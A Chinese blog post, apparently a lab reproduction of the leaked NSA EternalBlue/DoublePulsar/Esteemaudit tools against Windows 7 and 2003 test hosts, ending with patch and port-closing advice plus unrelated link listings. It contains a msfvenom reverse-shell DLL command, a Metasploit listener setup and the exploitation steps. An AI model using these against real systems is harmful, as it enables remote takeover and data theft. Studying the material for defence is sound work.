这个漏洞是前段时间爆出来的,几乎影响了全球70%的电脑,不少高校、政府和企业都还在用Windows服务器,这次时间的影响力堪称网络大地震。

-----------------------------------------------------------------------------------------------------------------------

一、实验环境

本机IP:172.16.11.2  Windows 2003

本机IP:172.16.12.2  Kali Linux

靶机IP:172.16.12.3  WIN7 64

靶机IP:172.16.12.4 WIindos 2003

一、影响版本

Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Sever 2012 SP0

二、漏洞危害

攻击者通过执行脚本,使目标主机蓝屏重启,获取Windows目标主机权限,对目标机器进行任意操作,攻击成本和利用条件都很低,只需在本地执行脚本,并设置相关参数。一旦攻击成功,攻击者能直接控制目标主机,甚至直接下载数据库,盗取商业机密。

三、复现过程

Eternalblue 可以利用SMB漏洞获取系统权限

Doublepulsar可以加载Metasploit生成恶意的DLL

1、首先我们要在工具的根目录下创建一个listeningposts文件夹,否则运行程序时会报错

2、 运行 fb.py

填入对应信息:

  靶机IP

  目标IP

  取消重定向

  指定日志文件目录

  创建新项目

  项目名称

  确认路径

3、这里我们已经配置完最基本的信息,需要使用插件

use Eternalblue    //使用Eternalblue

4、接下来我们一路回车就OK了,只有几个需要特殊设置的。要注意选择的操作系统、系统位数、传输方式。我们测试环境是Win7 64 FB传输方式,在这里设置就可以,其他保持默认

5、运行成功后会显示Eternalblue Successd

------------------------------------------------------------------------------------------------------------------------------------

接下来我们测试另外一种插件

1、用kali生成恶意DLL,我们 /home目录就会生成win.dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT= -f dll >win.dll

2、进入Metasploit,设置TCP监听端口,用于攻击成功后返回的Shell

msfconsole
use exploit/multi/handler //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp //设置payload
show options //查看配置信息
set LHOST 172.16.12.2 //设置本地IP
set LPORT //设置本地端口
run //运行

Metasploit已经成功运行,等待Shell的返回

3、将dll文件放到C盘根目录,使用Doublepulsar来加载生成的dll文件。

这里系统位数、后们操作、后们路径  --》 64、RunDLL、C:\win.dll,其他保持默认即可

----------------------------------------------------------------------------------------------------------------------------

使用Esteemaudit插件 验证3389 RDP漏洞 本靶机地址:172.16.12.4

1、和上述步骤一样,配置基本信息

2、使用 Esteemaudit插件 这里讲CallbackPort设置为8877端口(其他端口也可以)

3、手动加载 rudo_x86.dll、capa_x86.dll和lipa_x86.dll,因为插件默认选项都在D盘,它不能识别安装目录。

4、其他保持默认设置即可

Explodingcan IIS漏洞利用工具,只对Windows 2003有影响

Eternalromance   SMB 和 NBT漏洞利用工具,影响端口139和445 

Emphasismine   通过IMAP漏洞攻击,攻击的默认端口为143

Englishmansdentist   通过SMTP漏洞攻击,默认端口25

Erraticgopher 通过RPC漏洞攻击,端口为445

Eskimoroll   通过kerberos漏洞进行攻击,默认攻击端口88

Eclipsedwing   MS08-67漏洞利用工具

Educatedscholar   MS09-050漏洞利用工具

Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口

Zippybeer   SMTP漏洞利用工具,默认端口 

Eternalsynergy   SMB漏洞利用工具,默认端口 

Esteemaudit   RDP漏洞利用工具,默认攻击端口为3389

---------------------------------------------------------------------------------------------------------------------

四、漏洞修复方案

  使用防火墙过滤或者关闭137/139/445端口

  对于3389远程登录,至少要关闭智能卡登录选项

  升级补丁,更新系统

【渗透测试】NSA Windows 0day漏洞+修复方案的更多相关文章

  1. 应用安全-Web安全-漏洞修复方案整理

    通过HTTP头部字段防御措施整理 X-Frame-Options #反劫持 X-XSS-Protection #开启浏览器防XSS功能 Set X-Frame-Options  CSP X-Conte ...

  2. URL存在http host头攻击漏洞-修复方案

    URL存在http host头攻击漏洞-修复方案 spring boot使用注解的方式 -- 第一步:在自定义filter类上添加如下注释 package com.cmcc.hy.mobile.con ...

  3. 【渗透测试】Squirrelmail远程代码执行漏洞+修复方案

    最近网上有点不太平,爆出各种漏洞,等下会把近期的漏洞复现一下,发出来.安全圈的前辈总是默默的奉献,在这里晚辈们只能站在巨人的肩膀上,跟紧前辈们的步伐,走下去. -------------------- ...

  4. 渗透测试的WINDOWS NTFS技巧集合

    译者:zzzhhh 这篇文章是来自SEC Consult Vulnerability Lab的ReneFreingruber (@ReneFreingruber),分享了过去几年从各种博客文章中收集的 ...

  5. 网站sql注入漏洞修复方案之metinfo 6.1.0系列

    近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...

  6. DEDECMS 漏洞修复方案

    目录 DEDECMS支付模块注入漏洞 漏洞文件: /include/payment/alipay.php 漏洞描述: 对输入参数$_GET['out_trade_no']未进行严格过滤 修复方案: 对 ...

  7. Struts2 高危漏洞修复方案 (S2-016/S2-017)

    近期Struts2被曝重要漏洞,此漏洞影响struts2.0-struts2.3所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商.银行.门户.政府居多. 官方描述:S2 ...

  8. struts2架构网站漏洞修复详情与利用漏洞修复方案

    struts2从开发出来到现在,很多互联网企业,公司,平台都在使用apache struts2系统来开发网站,以及应用系统,这几年来因为使用较多,被攻击者挖掘出来的struts2漏洞也越来越,从最一开 ...

  9. Linux Glibc库严重安全漏洞修复方案通知(腾讯开发者社区)

    如何查看当前glibc的版本号? rpm -aq | grep glibc 尊敬的用户:       您好!2015年1月28日, 腾讯云安全情报监测到LinuxGlibc库存在一处严重安全漏洞,可以 ...

随机推荐

  1. 2.sleep和wait的区别:

    sleep是Thread类的方法,wait是object(Java类库的老祖宗)的方法 sleep阻塞的线程在指定时间后,会转变为可执行状态:wait它要等待notify的唤醒 执行了sleep的线程 ...

  2. 题解【POJ3252】Round Numbers

    Description The cows, as you know, have no fingers or thumbs and thus are unable to play Scissors, P ...

  3. 虚拟机NAT模式联网

    阿里开源镜像软件:https://opsx.alibaba.com/mirror 如何使VMware ip与本机ip处于同一网段 https://blog.csdn.net/kakuma_chen/a ...

  4. MyEcplise中编码格式的修改问题

    1.如果是在Run Configurations中修改编码格式的话,只能是修改当前java文件的编码格式,把改文件中的代码复制到 另一新建 的java文件中会出现异常,所以就会出现相同的代码在两个不同 ...

  5. SSI注入漏洞

    简介 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思.从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针.SSI具有强大的功能,只 ...

  6. HPS—虚拟地址映射

    HPS 如何对FPGA外设进行操作?hardware:在Qsys中将外设连接到AXI bridge上software:映射外设物理地址到到应用程序可以操作的虚拟地址,应用程序通过得到的虚拟地址入口控制 ...

  7. java 子线程异常处理

    如何在父线程中捕获来自子线程的异常呢 方法一:子线程中try... catch... 方法二:为线程设置异常处理器UncaughtExceptionHandler (异常处理也是在子线程中执行,相当于 ...

  8. linux下安装keepalived

    keepalived安装文档 1. 安装环境 su - root yum -y install kernel-devel* yum -y install openssl-* yum -y instal ...

  9. 关于反射中如何剔除实体类中serialVersionUID字段

    Field[] fields = t.getClass().getDeclaredFields(); //这里为了剔除serialVersionUID Field[] tempArr = new Fi ...

  10. Abaqus 载荷分类(部分)

    目录 1. 集中载荷 1.1 集中载荷施加方法 1.2 定义集中跟随力 1.3 指定文件定义集中节点力 2. 分布载荷 2.1 分布载荷分类 3. 热载荷 3.1 模拟热辐射 3.2 直接定义热流量 ...